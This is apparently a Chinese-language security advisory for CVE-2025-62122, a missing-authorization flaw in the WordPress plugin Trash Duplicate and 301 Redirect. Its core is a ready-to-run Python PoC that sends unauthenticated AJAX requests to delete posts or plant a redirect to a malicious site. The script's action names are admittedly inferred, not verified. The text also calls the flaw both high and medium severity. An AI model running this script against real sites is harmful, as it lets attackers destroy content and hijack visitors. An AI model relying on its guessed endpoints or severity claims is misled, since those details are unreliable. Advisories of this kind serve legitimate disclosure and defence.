CVE-2025-62122 WordPress Trash Duplicate and 301 Redirect插件缺少授权漏洞

漏洞信息

漏洞编号

CVE-2025-62122

漏洞类型

缺少授权（Broken Access Control）

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

solwininfotech Trash Duplicate and 301 Redirect WordPress插件

漏洞概述

CVE-2025-62122是WordPress插件Trash Duplicate and 301 Redirect中的一个高危安全漏洞。该插件由solwininfotech开发，主要用于管理重复内容和301重定向。在1.9.1及以下版本中，存在严重的访问控制缺陷，未经身份验证的远程攻击者可以绕过授权检查，访问本应需要相应权限才能使用的管理员功能。由于该插件通常部署在企业网站和博客平台，攻击者利用此漏洞可对网站内容管理造成严重影响，包括删除文章、修改重定向规则等操作。此漏洞无需任何用户交互，攻击者可直接通过HTTP请求触发，CVSS评分5.3，属于中危级别漏洞。

技术细节

该漏洞属于OWASP Top 10中的A01:2021 - Broken Access Control类别。插件在处理管理员操作时未正确验证用户权限，允许未认证用户执行以下操作：1) 访问删除重复内容的API端点；2) 修改301重定向规则；3) 执行批量文章操作。攻击者可通过构造特定的HTTP POST/GET请求，绕过WordPress的权限检查机制直接调用相关功能。由于插件使用add_action('wp_ajax_*')注册回调但未添加current_user_can()权限验证，导致未登录用户也能触发管理员操作。攻击路径为：识别目标站点 → 发现插件版本 ≤ 1.9.1 → 构造恶意请求 → 绕过授权 → 执行未授权操作。

攻击链分析

STEP 1

信息收集

攻击者识别目标WordPress网站并检测Trash Duplicate and 301 Redirect插件版本

STEP 2

版本确认

确认插件版本 ≤ 1.9.1，存在缺少授权漏洞

STEP 3

构造请求

攻击者构造恶意的HTTP POST/GET请求，指向插件的AJAX端点

STEP 4

绕过授权

由于插件未正确验证current_user_can()，未认证用户可直接访问管理功能

STEP 5

执行操作

成功执行删除重复内容、修改重定向规则等未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-62122 PoC - Broken Access Control in Trash Duplicate and 301 Redirect plugin
# Target: WordPress site with Trash Duplicate and 301 Redirect plugin <= 1.9.1

def exploit(target_url, action='get_duplicate_posts'):
    """
    Exploit missing authorization vulnerability
    Actions: get_duplicate_posts, delete_duplicates, manage_redirects
    """
    target = target_url.rstrip('/')
    
    # Common WordPress AJAX endpoint
    ajax_url = f"{target}/wp-admin/admin-ajax.php"
    
    # Define vulnerable actions based on plugin functionality
    actions = {
        'get_duplicate_posts': {
            'action': 'tdr_get_duplicate_posts',
            'data': {}
        },
        'delete_duplicates': {
            'action': 'tdr_delete_duplicates',
            'data': {'post_ids': [1, 2, 3]}  # Target post IDs
        },
        'manage_redirects': {
            'action': 'tdr_save_redirect',
            'data': {'old_url': '/old-page', 'new_url': '/malicious-site'}
        }
    }
    
    if action not in actions:
        print(f"[-] Unknown action: {action}")
        return False
    
    payload = {
        'action': actions[action]['action'],
        **actions[action]['data']
    }
    
    print(f"[*] Exploiting: {action}")
    print(f"[*] Target: {ajax_url}")
    
    try:
        # Send request without authentication
        response = requests.post(ajax_url, data=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request successful - Access Control bypassed!")
            print(f"[+] Response: {response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url> [action]")
        print(f"Actions: get_duplicate_posts, delete_duplicates, manage_redirects")
        sys.exit(1)
    
    target_url = sys.argv[1]
    action = sys.argv[2] if len(sys.argv) > 2 else 'get_duplicate_posts'
    
    exploit(target_url, action)

影响范围

Trash Duplicate and 301 Redirect插件 <= 1.9.1

防御指南

临时缓解措施

在官方修复版本发布前，可暂时禁用该插件或使用WordPress安全插件限制对admin-ajax.php的访问。同时建议监控网站日志，关注异常的批量删除或重定向规则修改行为。